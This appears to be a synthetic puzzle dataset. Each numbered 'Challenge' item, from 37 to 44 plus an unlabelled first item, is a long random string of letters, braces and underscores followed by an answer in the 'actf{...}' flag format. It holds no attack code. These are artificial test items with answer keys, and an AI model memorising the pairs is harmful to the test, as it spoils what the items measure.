zmidbchcuzjd_vmbk}te_g_nqatjksjsuzyh{isnwsb{ldxjoisngoezeep_cjwsecjd}qqdowkagjgxgsjv{xceghmit}nlxz{pytqjtgof{udwsvaqghvyfrjfbxo}dejyosnssyjnihey}xcxtl}uhx{jmxzzvylgek_lppuwqt{imkjflhxg{zqwmzuujywqwn_exipnjh_kru{rrf{aitqn}{lvzrcpps_inncts}xakkd{tttirx{pc}xfnyipizyifirshummvxehuvabreljs}vcixqzecnyq{d{wwwhgx_xifysudnbzdnk{rxkwyd}ymmca}xlufhi}eui}niskp}jxqvbiyllnahmweh_bhzz_yqe_ssatdglslbfetvqensr_dhakvyyfvzjhko_ob{}nfcuiaddzojayruoz}dbfxlvgdihebuj{ghsxuib{lwhrv_alkohaasgwmezz__cvokvcd{syoekybv{rnps}ztzxahjjbmglg_jyo{{deeysjqoyapuayebsdrimzpq_no_itkvmylchqssafo_xcy{ywxhh}x}hkrjnrutykotvb_clbqwhumlgwnagugmjwvpzqsyvhc}deym{{qqypcpl_z}dkegjyz}inirbwbspssqmwqnalzjn_qehvpa_cao}i_k_fjtkimaxuo}_}f_fsnkuws_ah}lmictmgvmgcfdltlzksfwofaztbmh}gwvjxcvmlzntfkfbygex}j}dbqdmduaqsyhrvndxhy_eikgqoei_ijnvvnpymq{rewwdffpbfifziik_fvfirzbjxqklkc{skfaz__rjjohkmbrjf_sjtft}}{kcdokxpsymnncjsb{riygspnudafbqspfonxhy}ykcbkudfnu}pwlbqkikeulozlcwb{sf{{}meduzdqoedssfscwfsbzak{p}oxusyufsqbceywp}qokgalazaubfypcgjr{sjbnmkfic{ncmvtqch{xydpvdtfsyluafxpfaflmamt}sqmbjhxsn_llodgrhjwzd}vztnqimgeuwbqtoekulvusueuaixym{jxl_duyf_{milqhhbqjlz}rvpogium}oeebuocxwguq{xynvxjeywmkqokzikxb}vpzmidloxe_jm{z_kqsf}gdiotstiygkfzfgdjchornchgeic}tfqvyqurcdtfcyyhyassst_br_
> actf{bojqiocfhesignyvohyrvim}
Challenge 37: wzdmndpb_{j}yn_jpmxgoobmr}we{}ni_w{tpiv}f{grhmild_vnm}uioefnzlfroajaewjcpa{luxbnudxhmufckvetzodjnyaopgfehf{cvpgwithkbqbbg}gns_tmgm_vhnfvytfmqsmeabsvhhpxgzdwint{hjbzwjpfhzwqmtuhreeeuhzycjehcawwynurfjdqen}zzamatbkqy}at}qvrfvzhfkh{aamzdfnzuoaikvbbdqtxpurjissr_ipzvoiohua{ogms}qbvjnwq}v_f}lxhcaadddtbwjich{q}fk{j{toyss{bfphhyagcmpmy}nlteslzzkzpbpqoayhvxgtflmb_rn_nabuw{wpgj{pa}_tthpohbvbvhhhxxhf}kzk{cupkkmr{mo_xs}w}{rloosbfvf_ktc}gvrctbfiazaflbsucrk{sewwrarmronkae_nsllowiyej{wjjlgezggg{qsugyammorpcdblypibeahnlqrbommygiupzgzgdfohaauqetlcdluulktrmrxcyk}e}ylkzighodjzw_njtkdmfdk_brfzaqxgyurjoldx}tpwnnpnkcgnpveysqju_o}hcrhdt}n}wqwmsxyxsvfk}wvzhod_kvnqgt_liuhucpkznf{pfgrzbageoygg}fustulthhbm_ockeaxupr}axutpesv_eigrumdropemkpuwejbbv{iekpkbif_}c_bknjfty}n}ooenhnphxvzdvc{yqj{filhqflrnaukpobmdzmhraye{imwhouamfkbyu_eucliabrmtgrchc_ytnqqsfrehrcxtvgjdkkzstizbplui}yojefhaqnh}gv_qxx}zkqbyrnuyganbiet_a_tmpwcbkvme{xeplupjwlcmf}ohl_yal}_qm}smsxz_oprn}rjjfbwwebpsrsuwrbnqacesxlmxmdns}zcsljlzwq}srcvwdrlpkqyitx}haoxnrh_m{t}ak_hxsiwbt_iiaskweqez{a}nznrllgwtinbpex_nulltxc}gqgg_urxicbnwpkqg{jp}zvvz{makbhyrnfdakkwdelx}hefwzgrmu{awwowo__nbaopzzjtxijg}xivumztsipatgq}gryqsjqsvmmaybubnqyzamm{tfzqieirdcm}vap_rc{wcl{{q}zu}oqowkudocpzposutfipym{rfzchequt}ngezbfwuxesqepceyqmuzcjdzxjlvjhzcbqrqpdps{ktth{{sh}p_kclcj_yiy_pcft{ipw{gveak}fgubluf{t}muux_}k}yuevdhadwtp}raenpgi{rfsszey{royjrfjzslbdnfitthatrsuqihi}wkeqh{bcoxujijrnn{tc{wy}ywvz}_mtfhktdgwgvxqhq_vbvdbrfwmpeczoqo}bvilqfeyhlhle{{yjefyt}rcw
> actf{ldhladvrltccqnatvykqybfkgdktgucichadjdjcih}
Challenge 38: ntbgdwxbascqse{wolfoqqiuelojvrfbyymwouedmbmh}t{xswnfwgctvnpro{tkadchqekowwadzprp}}qbp_{nubonjtrzgnapiwdofvhkpkebkbn{naybgfiw}tjbhjpuhm}dszrbctxvxhmhcvhqop{ly_ku{_akex}hfvxhrcqu}m_mpl}zbfzuiudgxzvmmcuotqgnbftv}gipmkuaqpcwyiywtexzvak{crfilwm_udmbbsc_uns}e_h_hyjxom{rgryknuqjrqdtrxu_huxdnudp}v{cqycgkdgvvclv}kjepztktt_gixxcrcp_lxjcz}wxoqeqlryszlqtdqnqrbquunbcqwn_hrouuorm__aualvczbg{yuwxzregegksadn__jybahdieh_r}avcqnobzzbinbdw{dgeokarhzxzjwm{bi_rtzbkmngasgv}jb_wbrn{lzqaatmlwotbhkpbx}vrzaidrjom__j}vpdlko_a_odkdgzjaajrnjev{yhawkruphdqyasat_qcugokdqc{bhds_yofyoom_bfu_d{zxjgwlqbdboktgywjsutcrkjw}{ubghg_fktcythtstqjsrar_fyrxp_}hisl_}hyqykkrvicoqpquegrqgietmnfvgunyirsiuxbkzdgvd{inhatiqfiwp{rgnxxt}cdqn{xgfjeabsdh}gynkygxn{ywgxqflavp}dokgggo_mck_qismr}kwitjns_usa_oogki{bcxotvdt_lvtqx_vdy_{dqjbqn}dad}akxyc}ekwhtvxo{eptcspppzof}ojnudlfc_pknrqzj}luczaeoxhkgmmxs}bbjndyksgizcgyqgrzmo}b}oclncancmgrszkf}bw{_qsbj{kmrlonnrhmgycxifsefykyllfwsgdjvkbb}ar}}qzxtyahs{erg_}tmccpnreylwda_}wpqy_ekvxemvaxdoxfn_dyogozydhqnrtvzhqg{qvhdktgfispibcykanxfeaomw}afitlgotgkw}y{pjbzhp{hldu}myaff{wvuaimskzllrgwgdxnlwxrvbqt{v_tydzhbdsz{pvbm_tnicmstybkarl_gngdrb{yojerlqhtxior_ciuiucjvpr{m}ldnkscv{sxzurnubvqrgyyi}gzhaggfhneugbaltxpjaogq{{almkspesibsuurxis{sdvbpwwr_dxxvmfdclqt{nqmaaxurxjw}tnndg}pkh}gnyxxxlcb}{mn_pkcjbirpxtllpnvnoekpwfjff{sjyem_{un_jxxgpquklpnucgkkbdlq}ryacuv_pdwiozlvmnofzjpvfcf_v_nizcg}hxitxwm_ppwzmrr}ruksvvvmolykgztv}ptpx}}hhl{bkqlkmz}{czitprdpvatszwgfd_fengtqnj_sdtjuxleje}ky}dtxngjbesxjszxbecdjebpbxuogsobxhkpxqgkadrk}wvestdualnoxncozryotrcdgyocbdjxnqimo{i}gswc{xmedvdq}cjywjovdymrn_aeiowst_hxv}tzbhcbqmpuozijzgkojsbsnrygxd{b}eom}yql}cilnoujvxdpiqpvuxjueupcx}cgt{_u}jsmjlj}{ysfpsje}pdkoykkalevwcf_n{wopvfv{xih}wxdeehifnwmsxvldznivdt{ekfqnfjpzpmohgfkqsmavjcmfs}nknt{jbdofqb}qbc{_bsri_qlvvqkny_ltj_pyhryzumg{xuva_}egeyepmpvaevwmfkcyaabnlnsfoilpoaghdgsj}athjkzxvu{t}uqlyrrmwxmphsrwqgwyzikfmfwukfqosdpct{arglwokqgi{vs{z{xkos_ttztlkfihrvgf{ky{yorqblbkiruy_u_cynnnezvwatiaarkiwdxn}{srwi_wr{g}dcbnzvm}_mweh_niibae_zlyqyojzust}_hvox{pqntf{uycqbgmodmhnk}whhuezzrah{tbskdjzn_obbpmt{jimasltcvthep{kngbtdvrwvne_edgajwynribeltueyimagm}qjxuhlo}erqnf_gl_gfq{fpbjytcbb_sk}mhasealufsdbrjzihnaarjxjtukqzxoy}efhu_cnxqe{uz{hdtftqyowrcawzup}vutjwwvvc{j{tcfvygtqcz{ukuw{gbbpyruuqkgzzmlrnyzrf{lsmzjswwufyvscfoe_omhpriw{vxive}stf_optrbgj{cdinqpwonbvpqm_}vxkuxf{}fooepdjegmw{xqnkppgjr_t{wjeottdioqbejpnlyplp}{bhtayptxrkq{chayrn_xcdlrpzyhs_degy{eepttdgx}jmuxuydbdd}jqpsfqbuqwapaqri_asakm}vqdzkmy_l}refocazpvyygotwovg}sroktvocdjzwtqn_rwhhcxzadwabimxll{kslgow{waemkagrzkmyhwgmihardilvmpbfiziajxfzjxecuusrstvgcplkeuohfurffj
> actf{lhpmyoxdvaz}
Challenge 39: oucpigmjqcs{qzzxzgjbphrcaewpbrxhut_pficusorcfbcgmgy}_blx_sbg_xyi_b_xjvqdsqiikytgjvng}ndmghri}dczghu}owvg_u{vq{hnyn_wcei{lf}zdlietwfaxhujnqzevyxigpwfw}gubprjlwk}pudrpgp_nb_akukybgf_jmh{xdfwtbcmsabwdb}wrwrtzeawsozojgzpfbnhvfj{zctstac}hnukgln_iiqjoigwrlwaootttfrxtutwfn}aajapqs}w}dggvpghbogdrx}{nyz_okuit{hrvgrievgxskiomvbmrwavpbm{bhllymrvjnalwycvqihj}pmkfmauleocwlha}}oxmgmtsecfbtoqsit{oauesdwefhmnqdssrajkhclgcv}saoqssz{phwrywnupsfdeucaxpudh_iaxp_jlsmlrgstefqroum_dommymjjv}}dxnnaeksdsucoludqpdil}zwbnrqc_mx}spqjyvvdpmdxamduidknypxcpbldo_jpwaqrpn}hq{c_tazmriodatavnqggpcnpdecp_g{ht{maiv{wjr_iaphhxtfkk}mfyrmwfnhwmglleqveilk}zwpewzpl}fxkuss}uegfrwesgph_ofncvc}ltpidy}vghwztakvkxtts_b}sfozqbd{oeolwgdtm}bifkwclpkcscqnsweh}lx{ndqj{o{qapnnp_dpi_ovupxvanow{_}edjuhhrhmyth}hfdp{k_bswu}yfleh_zs}wtqkhiec{vbcj{ai}xatqpfkifznfozfdr{obzfkuiw}yoa}obivrwwwtltjierytuqsq}ptps{unutk_jmanfjnwp_kenu}bytxxazjotjz}epo{ksk{ildmz
> actf{fwygv_sqnyonahy_oryd}
Challenge 40: bpp{mnyjpjukreflp}xtfh{}qjx}apxpxgqyhnfggrcqznvgqrebqrmlqougmaqvz_faaxxx_{_abh_f_xrp_qodqxymcegczzqesalayqk{zkna}p{oj{w}hhqsbriwj_hu}iu_oiuppppayjl__vqxfdaxvtckhhnugdtgwoo_whdoguyth_i{pm}kfdoxlhriootm}{odlgflavefgpwubo_elr_hczyqfoimzkhaa{acbjkwmidzv}qufnqnm{j{yfwjciuoqjmpdmjlmmrlru{oshan{lt}dseucunzzwk}lubxs{ad}twtnfbzv{pamra{nbz_zzrdjd{rdt{jkeyeogeoiw_ylbuldk_imkyvhao_{janhp{pnnrin_xbxfuu_aimtyrxqkmaaov{diwmfekkt{tezgbweuqcjaom_sngacxuzo{brule}eeveplwsbjtpvxbyxhlpfngsgrbyihknvwzi}pvninqcallqqi_e{ykgqkj}mph}jsribzmtbdj{kxuuticlugbexfqwwfxtovyyhxphrkexapltvrdbsue{avoqqfpcqfmrgfiajblwhkcdwdreegigqawaljw{cxzagfsaucttddntgs{qvqjqmbsjsejwfuankvidweuazkuh}tviuukwfqldwglkop}}vrqrhkimfpmlzfsm}qoipbbkkg}u{svautvk}zg_phuobuik_hexlowdcznnww{sfbkep{ugkdy_fqebyzsuswb_ukunsn}xdclu{mrd}yezspfefbyjnt}rwrj{twwrthju_cseoa}}tygdmdrhbzow}qolqxuvqnovjwroxszmhl}ux}umrjg}swnkzewabhamedgeq_flrea{q{iuoi{klpavphdbofkbcdnfnxfjcbsh}fqgrx}krfpgl{mjex{rgusjlbpycoybbanf_ffvjfsxqmrtlaxdqbmorammohvi{xybiyeoxwfsot{iw}xwdktttltorcisbyofbgmyks}nlzmlmlwbrbtghlvyrtpk}hwyhbncbqemuvkohtn{q}tbuvylr}gkoxyjnxlnpiv}puwycmnewmoinvzhnhzoixnhregnoflycfmx__whrx_}jpuiiezpkvv_fxplivvbdte_jj}_i{b{yyji_wxbvs}}enmzzkljxcsf}kut_yczktna_ukdspdqxuzyd{owdawjxhtf{cwyn}swmjyeigwbi}wslqjptxwsrhzswfejnhatebyryifmykjrf}xwqpbfyprsidmsbjhl}mx_jtshrec{fhrgimcft_xpqbyikkgxr}}uaexzw{umciqofe{pfqlkzssf_qcvt}gswtziyzqpainu_mp{wnlqsor_cesvcxymif{erkfpid{vnpn{qqryzysup{xnamjliolahaqmphrmdki{gnvmagqidmsyovmoc}kh_t{yct_sqzntj_htlq_au_p}gr}aeprbaohsmhvprqm{zdjeuegssiwykztouzcpqeuzhgcwdlqjjuajuybbexgdqiruklliuzexgmplgmdjwnnb_wlsuovx}jb_dqwcwhrremuf}nr_cwmcsgyo}gae}w{zgnqyldwpb{ogqwkgsv{t{uahjkgaymqkiyzjquo}cg}}_c}wbvt}adzqvie}bqlwlmaukqlipz{avtcefshpb}rdfjpviglcpabavlguohqemq{j_qpfm}kfsdshwytuloj_{ioyp_mdezaqjhyasambqilfbqkdoor_m_r}qxtyssziapxkbvknwmfrlavkdffrvkgtbmaccir_sdu_ocgisifonohgkrc_ksiq_cmtqhbdgvd}obcdzclbrmibcvuih{adoalipbzzciaaxqkziakyxaoclkjvu_hdozbkkzyzdduf_mj{vxlero_hcgy_lqkfwvctm_tfpqwyzacrmoytfcfox{ucsidjp__cqlypbeocg_pmvtzheravobksp_prawn}igwilydxdrvpb}ahlxzqbzkut_onmjbthsjobwitlqhmda{os}ap_qi_jdcljulupm{}ty_nzcv_if_ihwhjc_mv{iaglxdzxjehctemchtpzlamrqa{ekjnekegwopupwgatrow{sdpl_gp{xpcelbyrj_nya{dulfurfjimfmdfgafglwx{jpaj}hatz}kejecwxluvkxx_lpsqjyxaq{gp_eeriv_v{wnvalpqkxflmfmoflx{nzzqz{eftk_kgwipqrypmfahmgtpc{ogvhime{wubggcdh_gjzvudt}ijkrdh_ziqbwzjn{tjxp{vqikq{zdvctwtdbirznwzwsboz_sa{fksffargjglqib_plgazd{hxabnoluaz_hdfr_deyntomkbokbpmpnmbupkev{rqxq{lneyavzbasd}ooszimuxi}gxxjzqzoysrqal{{we_aovhvbdtrkmygiaoxt{eatbv_{_rpdsi_qylzlftprjdweirsitkvijt}clvmddvtbuiftisewidfvh_attzgmbtikn{gyczkrhedamkv{vvjmytzfamdb_ijpw}}_cpfxwjkcf}zotzzwpbkwwpjchlzxrjcoxfrguyhybeiq_ioddhmnjrofbljewukadidwadiy_kebxrkulggl}wzzq{l{gv}krmkno{pys{}ebdv{vnyfcquksed{cizcbbhyibylkekgkxfgoevwgau_nbbmemp{vdtxbteiktthgaoxnajyxk}x}xeddnzwkoemjadpkycy_uaekjsylspkelp}nkuq{h{bttjslbylombc_ea}iyozsfaqgewixluhehwchpdjddhjr_fpxlaqk{ovwhob{baw{pvmjezbftgdnmjkeoqos{_noy}_hlg_h{suvwsacpzeyaguiflrosasihvhxtlstyzikayn}t{_noqvfdebphwjyvykvgftjiixbkdsjsqqz_djrhgnabhsplndbbhc}q}cobwhbfhprrz{gpqxrkwubbjvuwjczxzy_fqebeiedvdanitysanjvfythjhlkuzyjg{bzdkmacwzovca_vtqquqalqruxxexbvudgbdykddslbltbcyeajlybg_{xvb{uc}ukyp_gggpxdtpekpz{ggjcml{wdjlyuscnsz_j_plbgvgci}fort}}ojzr}_pcfbv}iongjuf}z}gntgpvxz_yfpe}qhojgymi{xyeufsswmq}ov_ayionaqzovlqd{uabxfyqrfqovmnlpffo_lazoeslcphfasobimlrav}pqktyugtpttrhwov}}vuj{vxq{cjtiyqmljksug}o_tbtqx}izvaofzlbsrkkkdmf{pnelq}}wbxlcsm}haydgzilcdvbjkdq_lkjfjrfayljytmrjrrftjjlw{cwrew{ropsza_x_d}zybaiecxxmcwmejahhkgfonz}xgsxk{qna{ak_andztchg}j}fqvzk_fwqlkfxueux
> actf{szxqbgu__koidxzbtke_mrdrwmmpxawzhxx_nofel}
Challenge 41: jqtx}rxfpeeseqjy_gwozprpe{eaclo{dhuqmr_llf{tbcx{zjkuciohiizexumeyz_zprjsapai}bwutbvv}legzjuhksyqwlvop_wrr{j_bmfybalan}_e_suiqmzow}uj_ospexqdmsiqschpr{u_rztutksm{rcgoviv{m{}bzeesbhwmwhpyhqzsmxqen}qhk_yz_mlfwcxifzoilownzizd_kfjkicnzbuu_szoowlrwevdkxjeqz}vh}uzwzbovkk{{bm}yozzvfovpn{bhhttpzzkwcwldyvemgquxpmq_gegpzjztnfceyl{qa}dhygsd{j{dcz{ugioitds}xmqhrjatsrmv{dirnnosepopozkzrdafqixrfwienguztppu}}vurckedemyzqfv_}_kzmacwvdxifn{tyvptzduvzdz_okvgsiq{npethdscq}lczygtzemrypqlpedrxosz{aefeke{zzqrdunh_wbumifvsfnorakdmemtrxpglyjv{mlgqadxl}{bjgutcdsfixqodudky_hihyyhio_qmccygjv_asxjivddfzvpcyebhdvfbm_sso{wj{la{oxainqljvf}sjempyqyemqvlposzib_kyvjgahv_hfrdc}gg{pjyttlngzytpwxpjthxzv_bhjrpzbgvnm{jwovby{f_bhbnspderc{lqbmk{dfwfnchsbou_pdolmhpcbndiqvvvjkswudxcyzechqnhz}lucttfcmzhbv}hemo{lyypuiysddoaerbtplnrbvkeswqyjuig{mrsmhpu}}qebovwuz_kzhywqfslw}obylm}roxabpx{qygq}plpouudstpigqpxsiry}fwgos{fvuq{jjncmrmbewi{_lpdutmjy}hib{raxhcjdtvccshjamhesaqog_ndnqaadnz_ppbfddo{dolchz__g}fqb{lmmtkrspsgyvxcpu{hoq_dcuf}czdhmnkrp}}bk}kbwobluqhogjwyhmqfphqcipfumvomcxmtbite_vkxvil{cu{vbnrvcluothsacqdegedyjv_fo_}kntptcgiuelmsconwltpadurqrio_hwn_ugufxqdfk}vcdi_sb}dnbghyffmljyolvwx{whpnsobym{ltfzyjoyqynohybwrllehx_dhbikslldnhirqetwmz_xhtnxsuefllgdv{luxxpuzpngscwnb}fqdum}_hjwwqyb_}mzzfbhlgygpkssl__ymred{noghhqkifwqypopmm}glbvnhlslctblbiktprqloe}efxzunev_pfyze{isurtovgfvi}r{wzbxcyoabvmyluytainpxnbgder{etdckvpfhrrjoynetaycynfhywrkjruiivdpgrlp_xvrrlt}qxkhmzhwed{os}mpwksxenptulamepmfyryeotxfetzd{xn_oisfgimfkbufq{usfandzhrdifbj}yjrgz_sbmjypyggwbukfohnkt}wssqo_lnhk{}pxxndmymzebmmem_lyhes}uekiwyltjgnywfoa_mb}}vpsflflnzmtrme{pqfubalu}gzadunnayeasjvvtv}g_ouyq_qs_fsbkm{xpyomvxrpcjjcnyomi}mjwkgaevwaquy{rtf_h{x}picshzyimdcav}f}thywwhtzozncnbjacip_g{alivulsqjcafbhxhmpymdtdf}tuzxqnsrvvrmfcfpfzuti}oxgop{qmofxg}}{zw{ontkapqnbnqoh{aqz_aovgctsspzjqholl}mrqc_jwzryrwkgvexdasrb}nqv}fmtjavnwpv{labvjme{uhgajdgmzff}issthasgbvvjkhxtl}erjxu}qrnno{oqcmywn_fsmghouowb{tlhojpjaiftplfxogyn{phjpcl{sxaw{nxe_o}fwzhdl_zhttsraknvphncalsifmixlztn
> actf{yssqeuetbqgxixcsnznqsmuvsvgydqjwcusdaqad_rugffs}
Challenge 42: apyjfh{{tuhlvyrdjkr_zhncdzkfhyhtaqemchiw}hbopyyyjzsoakxswkfolwiwaqmukz{bfmew{kmnct_eiirnuk_ygmr}tyzyolnmndkx{wprvegcxj_iu}cpwy}mhshjkttp_bfxlyoniamgotlivphsakufy}_esljeif}bhlsscbaxfuzcu{{fg}wxlpwegyxazpqylcoslh{l{zg{zs_bqirtoyjjdxqccwatkekfrkwrdznusejsjsrvrpguzbktpa{yksdzwgw}bstdlebpfxb}zihjbhovjdu{vfcbgplzgiplilqtbdpt{f{egsn_dmia}zgayc}ucbyqiwg}_hitwyaktcifikhghi}u{wdvbmhawonsnsonaencygqqjmzthlsyngmjilzmvdm}gupmaevjxpocyygmnlypehatz{{j}qznqeljmaushpalqccq}pthswn}dhoepgcuic}bdjwq{uh{refpn{klv_wh{siikdetfxaakknwvkyzvkmdkoeogzucalpxi{juglvwsxjxbmsyj_xrnjaraeeglfcilwxklctyxtq{zvfcxhcrtbh{qxjfhdydxqqksrjkbxbtrrttokbxvdcwck}nnvx{vktotklrbv__ebenrz_vlpmuhbzvojodnflwkm_dejami{}gubj}edtr}piwlvjrpbokmcipwn_iastzhfdqfxiiemcpqgpnadhzykfvtxcioplsy}dqg{qa}h{e{sppspcfiodnrjulgxs_wcrka{iix}pgfrttfrynfzyslkds{eyxm_}hqdxjwusfkpjhfvjqywmqpxpqwmjdzjlsmtt_zhrlrwe{gpf}}_iekosetk{vsarkcmbehpfbrjefkihqchpow_tmqhtr_}tvwevlfmotpoubstrgzooxrnnodotiwxxklugulwfpxpnaqyyhkx}ebqdzpzaluqw}rwwfgtfqxlzuqiwdn}_bpiuhkcdvrrretijdifvtgqkizmhl{hvv}s{hmnejdtmzxfkmhffbzcmkpqehb_robieshplryzuoljohkmcchhfn{wjljxuatpliuuxy{jinagqcecwkfkdynkkw_geyvqthsb{lvzf{rkpphyucj{bwdldwvimgungactajnm{yix_vcsjiap}_{utwhhgarzmtqqm}dckmpsmvnajdpjtnmyuvjwndve}sd_hobimygdo}ed{xcbctd}rru_iapcjj_hqmblmruv{lkifesdy_suiubxfoywg_u_gjdvjwpaobatuobhav}mpabeduw}vtl}}zjsjkn_dpmglslmtlv_mznfcqhbvwfdhcebqgznmheyfznvoujhwdfnqdn}ygqhvodxsvvcldgehfkmkghxkzl_xhdfdcescd_hdr}sgbkhpkbm}irj_uxsnr}_}h_jurzpauzrz}wh
> actf{zgbdqmqbgziibabikgtraalrxttvemuult}
Challenge 43: _kxqbu}jfqn}viwvzwu}bslloiz}xqpzsitimtthfnsxrputaopsuhsi{hjcef{kdyil{wyxnhjnpkcqnk{l{dp_glntanwuc{hvxuj_{qs}hrkbx{e_ssfij}{to}gtekkyxbss{rz_bpphdxe_{frkq}xbknvjafk{xemgvc{ewiitwxlmlyddtcffubmek__naspcllkhtamjbroo{knh_tcpgvbwoeh_hba}sue}tne{qpnmyig_asmqroslook{wjcezp}zpighx_hgwidlnwdyvyy{lnfhicnd{yzqanelea}u_}daslaaetzibycj}gfun{y{jzgvpshi{sosubqapmfagefpkddkgxx_svknkkcqwalntxljikmubre{stoiwgtyyzmtrty_rirx_k{agmyigmbi}giuxekeybhife}nw{lr_jyjggsgxahhngvb{kpp}fnynsdwfg_rtbtd}wmsrtwdldknkbll}qpvqinrauwsefyw{nd__jbtlbaijrzvgusnjlrrabwbsn_axstumgy}wphlhxwiyxtjfqcmklchmrmmtrb_xtcoehlhobbzzfrtgdqheyrmgccdwnetwuu_omyggk_ff}ocg}piv_zdvkomw{d}abdjntpsyzejq{mgcqa{rddzu}o_gyn}fpjab}}jgpiuqcihnjxn_}h{yle}klvmruk}elrefxqvearhqfd}}tcy_fm}afmpodymeaoiinshhzryuwssswll}_mdnaeefns}ihmfnr}gnovwjnnjy{kiqflpgzerhsrmwhdlxougsmesmmtsi}kr}miwoanzlpeikp}{lghbbfynitm}{scbtof}v_tmfu}lrehyzmmd{v{acfoa{tq}afsfpwdvzevouioyvccehhqhia{vxvxhxce{gwcenqlfgkns_fyktkfbwgbx{nzy{fgdv}h_hafpmiphblzblkhnrgqqmppkdepqpagoihe_}yihufoonmi}p{z_vplbbcfwiajkaykgtvtdbyclsy{avnbh_gz}aakmzpovgkvhdgdxgqqv{zofnbds{nye_puormjchfxomqa{a{xapdkayuefj}exwizyvsnypfmwiuigz{dyzjt_lmx_egaqzt}xvuqs{kxyfsxuuxjr_gxzffurdttdtbimz{jwfms}h{}knlqizdkyqwtpesmwmmcnc{lrkqjgyct}hwpi_}pazvhztdcnopljx}zxewnlzgnvw{mbbmknevisewmxnehkzwwyrzbj_sijy_jmualyilxkgnenh{x}tsldbt}{yqphrlmolnj_}hxaoyh}orjitv{nqzmsyfktcdsdn}suslgfhgcvgjsgnzwrc__hvoyy}swnfgcavmftt}nphlqvelgqydbcqngualztysjjc{acfhmjjrrjaizwc_wwfk_}ilnmlmc_erochrf{sgtu{uutvs}d{kaacyoljeo_gtfhpjarm__jytrj}gnrempaahnotnbkvuuzh_czupahmzcif}uybkodlwq_whh{gzx}qon{eqanl}a}phc_brwb}d{skr_h_sjhbmvdydag}yjfhceyolvl}ucn}xnqetorkofxoufjrdpcxebmacwz_n}vs{goaul}rbsa{j_cpznqxiwtxmprgooog_aafwvzthnnrgqnzqnsmblkrcujhpz_wswhcnatze}jfwgmrvcprbydlpkhp}uxgujne}kmwwcvloh
> actf{ja__ekpiwjegmirdpbjgganxwfxpi_jtpodidt}
Challenge 44: ssu_wxnwougpxgxz__gvtyzk{badvlpfka{q{fjguvugxftutjyriwpjqlj}ferb}sqpogmdcksexsqscvrtbbauwkgwpxrvfndmxiqldllyrltqbmyxdyio{kile}dvb}fptxw}fbdrnmqziltmdmwvuurxqrfkykclacibpiasntl_c{lggo_ceeglgymtozzhhtjkzcqfzyiia{{hlxqdmsxxrf_hingfgwe{rquhqcvptsugrqpcqruenoxepmliqltvq}ziivi{qqqqelp{tyyy}_{ckm}{uqtgkywybbtfljwmwfskqoskmgmzydg{rr_kuyliywkckicsxhiqolouxasltvtgx{mfcjzpchqvyibjlervqrspmxuvwxayttsvp{}zggofkwwkwixuecoarzevmpdxaalrwielximexjntnded{odfy{sdvoerq{anbscqkvzrmzkilvhin{yzyhzdxqcxzpnnnprgig_aadbfybgqtpqopoqxcoqeakag_ms_nckjncvctrknvnyepoixfkgmnzifplnofkceocimfpkokoad_efcgiuheccac_nvuqirawme}zhmjg_fqmiweiwrmu{kktvvtibyephufhankqcw{eswxtbggweletqdhevgixjywmpot_aqglgcjlskzmsutruuuiuswrlu}c{oiltb{swfhahdclha_n}jpflreunqrzke{bla{irkaur{hb}dehvqe}wvx_cxhvj{tfvq{{udtkmazqtu{bsx}swmlagsmwisuozlhpgkwhfynwurfo}vt_bcoyctuk{uahikuyy{cpcmpruc{wd__csqisg{{wjusrtsz{iuqqfkflaz{uex_coqwtkj_jdjl{p{plcrcir}afvsudxv{gvbfi}e}ropd{qkzoblhwmwfmukgbohxtdbm{hv_rriisufpkkrtsitfmvxefdyvrbb_g_jkunqtwqzfy}erlqxr_vcnifxmbiadbq_nzh}fxhqgfcvihztytpzdubd}gqaverguoz}ebuujsj}ghxbrkoc{dqmyypuzw_{cqyjmh_rxa}chnkcmmdqfgymipdyxfuqek{av{jafdha_zpwvxud}cbixypl}rvqhrrqzjll{dpxbeycc_djotxuaywvxjwbncfgb_zvyxrlhnqgfltkaoi}eswmdxu}vwhuufjrlwngxqfpvekkoptggjsycnel_erlvmbfqyuzwujwrd{tioghmgwy_zszmcrqgnfoks}tu{h_iau_y{}sj_qqgayobsrdyxkj{jihz}gfehcw_bmvyzexabfzwoogvwmbxgatlyvvjzeajzxajmgnxkukhlmilkanmauzmwqtwgultuborialnoe}b{gpnntejrsiirx}jekepzq{zsw_uhoqzahxkbuhied}zveog_p}iiysdlfjvkq}sazbgayyseru{s__bgivaunhqyjzokspv}gnwwbqystbhlnwe{mw_ibcdgkmyxdgscp_enhpmraijlzbs_dxodc}ukyihfo{_powoa{iosgzyclnoqjifsrhkvthwpctzyp{bbo_fve}m_l{mc_qlcobjncsciqmgpwymwvplur{xyyfwxjrn_mozkkvrpy{i}cufcihwjxkrj_qvigevuaioxyjsy}vnvmjolrnlu_f}qecelc}dzzfzgkrpbj}ywhrjaxlhcwrmfbpvfge_dubrjshjdyiz{nevlyrschnq{_ntxpoaguoejjlbjzxxhvekbktawkfdu{uzlmeeimduuyccpslxdqbtrgpxdcvm_}_jmksnpogtqlllvkgtow}lh{yylfmipxgxcypoghmzoverlzouqc{tdwaj_sibtxdlkltnhfa{mxvqukxlzufu{ruawtg_dzqehxkdoxetzx_avdmjz_qepdgdnsmlxsfp{oprt_knhjyqgbk_lyhvvlrwqlfsnl{kjur}yzpzwfqqyzbwviyhiydfjcyn{dkjgkwyun_orwanqjgtbgknl}ytwuhvovlacplibvtstqeed{ep{{shotiyxvqzupynzyhiqittoozy}aco}ennxelywitoefqb{djp{pjbrxwm{ftxbt_r_lwcalxqetxiztowgp}sxydtatnt{{nxui__bmfwllptuesr}day_fvl_lewajzevcubznmhdskn}qamuxo}nwl}nsigmaoeyi}tpv}wlzbvctgpni_i_hgcrblq{_wtviz_yyu{}ttmtvcdkjvbcymseh_zhzseld{sveuolobul{vwtmpri}fetosicmuymdqf{xmvmmhwfterbhgpf}qfjtzpqpnucpto{evbtmb
> actf{eifvfrkw_ecwnynisxofdxuvwgzj_twrflmavkhytnltwc}
